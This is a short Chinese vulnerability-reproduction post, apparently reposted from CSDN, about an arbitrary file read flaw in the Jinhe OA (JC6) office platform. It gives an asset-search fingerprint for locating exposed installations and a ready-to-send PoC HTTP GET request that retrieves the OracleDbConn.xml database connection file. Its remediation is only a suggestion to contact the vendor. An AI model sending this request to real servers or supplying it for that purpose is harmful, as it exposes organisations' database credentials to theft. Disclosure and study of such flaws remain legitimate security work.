【漏洞复现】金和OA任意文件读取漏洞

发布时间:2023年12月18日

Nx01 产品简介

????????金和数字化智能办公平台(简称JC6)是一款结合了人工智能技术的数字化办公平台,为企业带来了智能化的办公体验和全面的数字化转型支持。同时符合国家信创认证标准,支持组织数字化转型,实现业务流程的数字化、智能化和协同化,提高企业竞争力。

Nx02 漏洞描述

???????金和OA存在任意文件读取漏洞。攻击者可以读取OracleDbConn.xml文件获取敏感信息。

Nx03 产品主页

????????app.name="金和 OA"

Nx04 漏洞复现

POC:

GET /c6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

Nx05 修复建议

????????建议联系软件厂商进行处理。

文章来源:https://blog.csdn.net/qq_37113223/article/details/135063762
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。